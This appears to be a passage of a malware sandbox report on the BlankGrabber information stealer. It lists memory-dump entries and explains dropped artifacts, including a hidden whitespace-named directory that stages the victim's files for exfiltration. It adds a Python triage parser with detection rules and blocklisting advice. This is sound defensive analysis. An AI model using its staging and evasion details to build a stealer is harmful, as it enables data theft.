memory/4164-385-0x0000000075110000-0x0000000075620000-memory.dmp

memory/4164-400-0x00000000032E0000-0x000000000366C000-memory.dmp

memory/4164-457-0x0000000075110000-0x0000000075620000-memory.dmp

memory/4164-459-0x00000000750B0000-0x00000000750BD000-memory.dmp

memory/4164-467-0x0000000074DB0000-0x0000000074E59000-memory.dmp

memory/4164-471-0x0000000074880000-0x0000000074998000-memory.dmp

memory/4164-470-0x00000000749A0000-0x00000000749AC000-memory.dmp

memory/4164-469-0x00000000749B0000-0x00000000749C0000-memory.dmp

memory/4164-468-0x0000000074A20000-0x0000000074DAC000-memory.dmp

memory/4164-466-0x0000000074E60000-0x0000000074E8C000-memory.dmp

memory/4164-465-0x0000000074E90000-0x0000000074E9C000-memory.dmp

memory/4164-464-0x0000000074EE0000-0x0000000074EF6000-memory.dmp

memory/4164-463-0x0000000074F00000-0x0000000075037000-memory.dmp

memory/4164-462-0x0000000075040000-0x000000007505B000-memory.dmp

memory/4164-461-0x0000000075060000-0x0000000075078000-memory.dmp

memory/4164-460-0x0000000075080000-0x00000000750A7000-memory.dmp

memory/4164-458-0x00000000750C0000-0x00000000750DE000-memory.dmp
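Reading the dropped-file listing above takes some practice: it is the sandbox's file table flattened to a path line, a blank line and then the MD5/SHA1/SHA256/SHA512 digests, interleaved with memory/<pid>-<index>-<start>-<end> dump entries. The entries a responder should pull out first are the PyInstaller one-file extraction directory (_MEI49642), the blank.aes payload inside it, the bundled rar.exe and rarreg.key used for packing the loot, the __PSScriptPolicyTest_*.ps1 file PowerShell writes when it probes script-enforcement policy, the uv0yazf4.cmdline / uv0yazf4.0.cs / CSC*.TMP / RES*.tmp set that csc.exe leaves behind when PowerShell compiles an Add-Type snippet, and the staging directory under %TEMP% whose name is nothing but spaces and a zero-width character, under which copies of the user's Desktop, Documents and Downloads files sit ready for exfiltration. The following parser is an added example, the editor's own code rather than anything from the report or from the BlankGrabber project; the rule labels are the editor's wording, and the final listing entry with a truncated digest is constructed to show the hash-length check firing:

```python
# Added example (the editor's own code, not from the report or the
# BlankGrabber project): parse the dropped-file listing above into IOC
# records and flag the entries a responder would triage first. Rule labels
# are the editor's wording, not tags produced by the sandbox.
import re
from dataclasses import dataclass, field

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
MEM_RE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


@dataclass
class Dropped:
    path: str
    hashes: dict = field(default_factory=dict)
    errors: list = field(default_factory=list)


def _whitespace_dir(path: str) -> bool:
    """True if some directory component is only spaces / non-printing chars
    (the staging directory under %TEMP% in the listing above)."""
    parts = re.split(r"[\\/]", path)[:-1]
    return any(p and all(c.isspace() or not c.isprintable() for c in p)
               for p in parts)


# (label, predicate over the lower-cased path with any \??\ prefix removed)
RULES = [
    ("pyinstaller-onefile-dir", lambda p: re.search(r"\\_mei\d+\\", p) is not None),
    ("blankgrabber-blank.aes", lambda p: p.endswith("\\blank.aes")),
    ("bundled-winrar", lambda p: p.endswith(("\\rar.exe", "\\rarreg.key"))),
    ("powershell-policy-probe", lambda p: "\\__psscriptpolicytest_" in p),
    # csc.exe leaves <rand8>\<rand8>.cmdline/.0.cs/.dll, CSC<guid>.TMP, RES<hex>.tmp
    ("csc-add-type-artifact", lambda p: bool(
        re.search(r"\\(csc[0-9a-f]{32}\.tmp|res[0-9a-f]{4}\.tmp)$", p)
        or re.search(r"\\([a-z0-9]{8})\\\1\.(cmdline|0\.cs|dll)$", p))),
    ("whitespace-named-staging-dir", _whitespace_dir),
]


def parse_listing(text: str):
    """Return ([Dropped], [(pid, index, start, end)]) from the report layout:
    a path line, a blank line, then zero or more 'ALGO hexdigest' lines."""
    files, mem, cur = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            pid, idx, start, end = m.groups()
            mem.append((int(pid), int(idx), int(start, 16), int(end, 16)))
            cur = None
            continue
        h = HASH_RE.match(line)
        if h:
            if cur is None:            # digest with no path (a cut listing)
                cur = Dropped(path="(path missing)")
                files.append(cur)
            algo, digest = h.group(1), h.group(2).lower()
            cur.hashes[algo] = digest
            if len(digest) != HASH_LEN[algo]:
                cur.errors.append(
                    f"{algo} has {len(digest)} hex chars, expected {HASH_LEN[algo]}")
            continue
        cur = Dropped(path=line)       # anything else starts a new file entry
        files.append(cur)
    return files, mem


def triage(text: str) -> dict:
    """Map each noteworthy path to its rule hits and hash-format errors."""
    files, _ = parse_listing(text)
    out = {}
    for f in files:
        p = f.path.lower().removeprefix("\\??\\")
        hits = [label for label, pred in RULES if pred(p)]
        if hits or f.errors:
            out[f.path] = hits + [f"hash-error: {e}" for e in f.errors]
    return out


# Excerpt of the listing above (digests as printed there) plus one constructed
# entry with a truncated digest to exercise the length check.
SAMPLE = "\n".join([
    r"C:\Users\Admin\AppData\Local\Temp\_MEI49642\blank.aes", "",
    "MD5 036f6d1f6c2f71c67bc40d973c3ee020",
    "SHA256 e491504397f5d7211c3f66f2dc7c15a56a18598039bf1b1377db9183c0f8f7c9", "",
    r"C:\Users\Admin\AppData\Local\Temp\_MEI49642\_ssl.pyd", "",
    "MD5 b0b8317d4311645ef24652afc8253cbf", "",
    "memory/4164-54-0x0000000075080000-0x00000000750A7000-memory.dmp", "",
    r"C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe", "",
    r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ymcnr2tk.rql.ps1", "",
    r"\??\c:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.cmdline", "",
    r"C:\Users\Admin\AppData\Local\Temp\RES4E4A.tmp", "",
    # directory name approximating the whitespace-only one in the report
    "C:\\Users\\Admin\\AppData\\Local\\Temp\\  \u200c       \\Common Files"
    "\\Documents\\Are.docx", "",
    "MD5 a33e5b189842c5867f46566bdbf7a095", "",
    r"C:\Users\Admin\Desktop\constructed-bad-entry.txt", "",   # constructed
    "SHA256 deadbeef",
])

if __name__ == "__main__":
    for path, hits in triage(SAMPLE).items():
        print(path, "->", ", ".join(hits))
```

When turning this listing into blocklist entries, take the digests of triggerbot.exe, blank.aes and the whitespace-named staging directory's contents, not those of the _MEI49642 runtime files: libffi-8.dll, libssl-3.dll, libcrypto-3.dll, sqlite3.dll and the .pyd modules are stock CPython and OpenSSL components that PyInstaller bundles into any program built with the same interpreter, so hashing on them will match benign software. The csc.exe artifacts and the PowerShell StartupProfileData-NonInteractive files are likewise generic to the technique rather than to this sample; they are useful as behavioural detections (PowerShell spawning csc.exe from a user's Temp directory) but not as file hashes.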